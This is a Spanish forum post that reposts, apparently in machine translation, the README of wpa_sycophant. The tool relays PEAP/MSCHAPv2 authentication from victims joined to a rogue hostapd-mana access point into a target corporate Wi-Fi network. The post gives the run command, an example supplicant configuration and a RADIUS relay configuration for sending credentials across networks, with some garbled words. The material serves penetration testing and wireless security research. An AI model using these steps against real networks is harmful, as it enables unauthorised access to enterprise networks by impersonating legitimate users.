Foro Wifi-libre.com

Una herramienta para retransmitir la autenticación de la fase 2 intenta acceder a la red inalámbrica corporativa sin descifrar la contraseña.

Esto fue lanzado como parte de una charla de Defcon 26 y es un componente en el ataque de retransmisión MSCHAP, el otro es Hostapd-Mana con el indicador enable_sycophant .

Soporte actual
PEAP básico usando MSCHAPv2
Cómo
Para utilizar esta técnica, es necesario que ejecute un punto de acceso no autorizado para que un usuario legítimo se conecte a usted para que pueda transmitir el intento de autenticación a Sycophant.

Para hacer esto con hostapd-mana , agrega una bandera. enable_sycophantMana escribirá la primera parte de la respuesta al desafío una vez que el usuario se conecte. Sycophant lo detecta para iniciar el apretón de manos contra el WiFi objetivo.

La ejecución de wpa_sycophant se puede hacer usando el script wpa_sycophant.shy los comandos admitidos actualmente son:

-c para darle un archivo de configuración, sugiero modificar el ejemplo proporcionado.
-i para proporcionar la interfaz a utilizar.
un comando de ejemplo sería:

sudo ./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlp0s20f0u6

Configuración de ejemplo

network={
  ssid="TestingEAP"
  # The SSID you would like to relay and authenticate against. 
  scan_ssid=1
  key_mgmt=WPA-EAP
  # Do not modify
  identity=""
  anonymous_identity=""
  password=""
  # This initialises the variables for me.
  # -------------
  eap=PEAP
  phase1="crypto_binding=0 peaplabel=0"
  phase2="auth=MSCHAPV2"
  # Dont want to connect back to ourselves,
  # so add your rogue BSSID here.
  bssid_blacklist=00:14:22:01:23:45
}

No te retrases a ti mismo
Dado que estará ejecutando un AP deshonesto potencialmente cerca de su suplicante, existe la posibilidad de que intente retransmitirse a sí mismo. Para detener esto, verifique el MAC / BSSID de su punto de acceso y agréguelo al bssid_blacklistde su configuración.

Relé remoto
Si desea separar AP y Sycophant para que se ejecuten en hosts separados o si desea utilizar equipos de grado empresarial.

Esto se puede hacer ejecutando MANA en modo solo RADIUS. Esto creará un servidor RADIUS local que retransmitirá la autenticación al Sycophant local. Esto le permite configurar su pícaro para usar ese servidor RADIUS remoto y transmitir credenciales a través de Internet u otras redes.

A continuación se muestra un ejemplo de configuración de servidor RADIUS para MANA con Sycophant habilitado:

i

nterface=<Ethernet Interface>
driver=wired
# If you would like to run on loopback:
#driver=none 

eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=rogue-ca.pem
server_cert=radius.pem
private_key=radius.key
private_key_passwd=

radius_server_clients=hostapd.radius_clients
# Contents of hostapd.radius_clients:
# 0.0.0.0/0 P@ssw0rd

radius_server_auth_port=1812

# -1 = log all messages
logger_syslog=-1
logger_stdout=-1

# 2 = informational messages
logger_syslog_level=1
logger_stdout_level=1

enable_sycophant=1

A continuación, puede utilizar este servidor RADIUS remoto con cualquier AP que admita la autenticación RADIUS.

https://github.com/sensepost/wpa_sycophant

PD:como mencione antes en el titular no es de mi autoria profesional;pero lo coloco en el foro por si alguien no lo conocia

Ultima edición por sagael (29-12-2020 16:49:47)